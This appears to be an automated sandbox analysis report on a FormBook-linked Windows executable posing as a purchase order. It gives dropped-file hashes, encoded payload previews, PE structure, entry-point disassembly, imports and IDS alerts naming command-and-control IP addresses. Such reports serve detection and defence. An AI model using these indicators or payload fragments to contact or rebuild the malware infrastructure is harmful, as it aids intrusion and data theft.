                                                                                      Preview:EA06..0..[-w9..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.994352075567934
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:q5buJtERmLfypQeAtoEmCTqLuXqPfKHZMtoPTW0Dpp9FES+gKVTFzPvR:q1usmLfah6IaXqPC5ooL5xFES+1JzXR
                                                                                      MD5:F5CDF90E36117F3EB7CC8804601A14A9
                                                                                      SHA1:930E6331C675AD4302B3E3FA06C470CD26AE538B
                                                                                      SHA-256:87675C6C3DAED3AC5196B0BFDE77C67D323EC023767F6EAB90AE01B4A9F5807B
                                                                                      SHA-512:E38945C874FAF90E193F01838FDA5DA56D4ADE8C7ADD97A78DA002880EE27DC1CA48B81F7624145E00E14A4DA8DD5391F31BDA14C9FDEEFF90FA1DB441885D1D
                                                                                      Malicious:false
                                                                                      Preview:t....GIHO...^....d.YD..q4\...9OXMYGIHOY7TWA59OXMYGIHOY7TWA5.OXMWX.FO.>.v.4u.y.1.:h?+X3% X.,9#7(=h-<.&"/.P!x...i% =RzZL?.OXMYGIH6X>.j!R.r8*.z)/.C...{U^.B..u((.-....Y(..0$!u/>.TWA59OXM..IH.X6T..scOXMYGIHO.7VVJ42OX.]GIHOY7TWA.-OXMIGIH?]7TW.59_XMYEIHIY7TWA59IXMYGIHOYGPWA79OXMYGKH..7TGA5)OXMYWIH_Y7TWA5)OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7Ty5PA;XMY..LOY'TWAc=OX]YGIHOY7TWA59OXmYG)HOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):143378
                                                                                      Entropy (8bit):2.991317071383019
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lC6Hbc8ZhkCXWqb63Mic69+Vot6Qbk3oNV1U:1VMjtU
                                                                                      MD5:8C721A91156338C1B049063882794EF3
                                                                                      SHA1:FFC83EA9BC21A468DC7922751D36AD7254CE87E6
                                                                                      SHA-256:4A14D3039671A9049BACAF2A81F2D408D732E06AF579AE9DAEA22E6195F8C9BC
                                                                                      SHA-512:7C6B6FCD33021810D4459DF6713DA5482BC526C3F9F4B239382B1EF4083A9BBFFF93535026C591F31289E652E17B1FB9F618DC83F2C46B3A32F96DD3EB0E0D09
                                                                                      Malicious:false
                                                                                      Preview:dlks0dlksxdlks5dlks5dlks8dlksbdlksedlkscdlks8dlks1dlksedlkscdlkscdlkscdlks0dlks2dlks0dlks0dlks0dlks0dlks5dlks6dlks5dlks7dlksbdlks8dlks6dlksbdlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks8dlks4dlksbdlks9dlks6dlks5dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks8dlks6dlksbdlksadlks7dlks2dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks8dlks8dlksbdlks8dlks6dlksedlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks8dlksadlksbdlks9dlks6dlks5dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks8dlkscdlksbdlksadlks6dlkscdlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks8dlksedlksbdlks8dlks3dlks3dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks9dlks0dlksbdlks9dlks3dlks2dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks9dlks2dlksbdlksadlks2dlksedlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks9dlks4dlksbdlks8dlks6dlks4dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.106414733161928
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:PO AT-5228.exe
                                                                                      File size:1'175'040 bytes
                                                                                      MD5:3df965173d78acbf95001caccbeaa150
                                                                                      SHA1:0ebe604c158eca5244c2fb19d56b03f6f7ae338a
                                                                                      SHA256:865ba0cdbc273e3d3035ec2acaf6510977798e008e79546e96e33e289b22c3b2
                                                                                      SHA512:b607e9a714b12b6c449a236b76309dfd9f1079b630d755b7787b4ab252ccdb1ce2ef36fea4188f5f2c8fb466cc4fc1604a691ab4c2d4297f4703dfa3ef40d7c9
                                                                                      SSDEEP:24576:wtb20pkaCqT5TBWgNQ7apWZJH94uCiP6/WVX7fe6A:5Vg5tQ7apWvOuLyaX7G5
                                                                                      TLSH:E645CF2373DD8365C3B25273BA667701AEBF782506A1F96B2FD4093DE820122525E773
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x425f74
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x673436AE [Wed Nov 13 05:18:38 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                      Instruction
                                                                                      call 00007F74C858102Fh
                                                                                      jmp 00007F74C8574044h
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F74C85741CAh
                                                                                      cmp edi, eax
                                                                                      jc 00007F74C857452Eh
                                                                                      bt dword ptr [004C0158h], 01h
                                                                                      jnc 00007F74C85741C9h
                                                                                      rep movsb
                                                                                      jmp 00007F74C85744DCh
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F74C8574394h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F74C85741D0h
                                                                                      bt dword ptr [004BA370h], 01h
                                                                                      jc 00007F74C85746A0h
                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                      jnc 00007F74C857436Dh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F74C857437Eh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F74C857435Dh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F74C85741CFh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F74C85741D3h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F74C8574225h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F74C8574278h
                                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                      • [LNK] VS2012 UPD4 build 61030
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x55ddc.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x11a0000x6c4c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xc40000x55ddc0x55e006c078aef17878ee1f04d594f4d5a0801False0.9262076965065502data7.891175276345883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x11a0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xc44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xc45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                      RT_ICON0xc48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                      RT_ICON0xc49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                      RT_ICON0xc58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                      RT_ICON0xc61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                      RT_ICON0xc66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                      RT_ICON0xc8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                      RT_ICON0xc9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                      RT_STRING0xca1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                      RT_STRING0xca6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                                      RT_STRING0xcad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                      RT_STRING0xcb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                      RT_STRING0xcb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                      RT_STRING0xcbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                      RT_STRING0xcc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                      RT_RCDATA0xcc4100x4d4b2data1.0003348136730323
                                                                                      RT_GROUP_ICON0x1198c40x76dataEnglishGreat Britain0.6610169491525424
                                                                                      RT_GROUP_ICON0x11993c0x14dataEnglishGreat Britain1.15
                                                                                      RT_VERSION0x1199500xdcdataEnglishGreat Britain0.6181818181818182
                                                                                      RT_MANIFEST0x119a2c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                      DLLImport
                                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                      UxTheme.dllIsThemeActive
                                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishGreat Britain
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-13T09:26:31.986660+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449730TCP
                                                                                      2024-11-13T09:26:44.569269+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973638.88.82.5680TCP
                                                                                      2024-11-13T09:26:51.947915+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.458815TCP
                                                                                      2024-11-13T09:26:53.351914+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.458816TCP
                                                                                      2024-11-13T09:27:00.343483+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4588173.33.130.19080TCP
                                                                                      2024-11-13T09:27:03.753028+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4588183.33.130.19080TCP
                                                                                      2024-11-13T09:27:05.405537+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4588193.33.130.19080TCP
                                                                                      2024-11-13T09:27:07.951083+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4588203.33.130.19080TCP
                                                                                      2024-11-13T09:27:14.244016+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.458822194.58.112.17480TCP
                                                                                      2024-11-13T09:27:16.921423+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.458838194.58.112.17480TCP
                                                                                      2024-11-13T09:27:19.306881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.458854194.58.112.17480TCP
                                                                                      2024-11-13T09:27:21.875358+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.458870194.58.112.17480TCP
                                                                                      2024-11-13T09:27:27.678498+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4589023.33.130.19080TCP
                                                                                      2024-11-13T09:27:30.221107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4589173.33.130.19080TCP
                                                                                      2024-11-13T09:27:32.803146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4589323.33.130.19080TCP
                                                                                      2024-11-13T09:27:35.341841+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4589483.33.130.19080TCP
                                                                                      2024-11-13T09:27:42.064513+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.458983104.21.14.18380TCP
                                                                                      2024-11-13T09:27:44.597204+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.458999104.21.14.18380TCP
                                                                                      2024-11-13T09:27:47.160557+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.459009104.21.14.18380TCP
                                                                                      2024-11-13T09:27:50.170836+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.459023104.21.14.18380TCP
                                                                                      2024-11-13T09:27:56.034508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45905867.223.117.14280TCP
                                                                                      2024-11-13T09:27:58.597030+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45906967.223.117.14280TCP
                                                                                      2024-11-13T09:28:01.387326+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45908567.223.117.14280TCP
                                                                                      2024-11-13T09:28:03.667072+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45910167.223.117.14280TCP
                                                                                      2024-11-13T09:28:09.323526+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4591023.33.130.19080TCP
                                                                                      2024-11-13T09:28:11.872164+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4591033.33.130.19080TCP
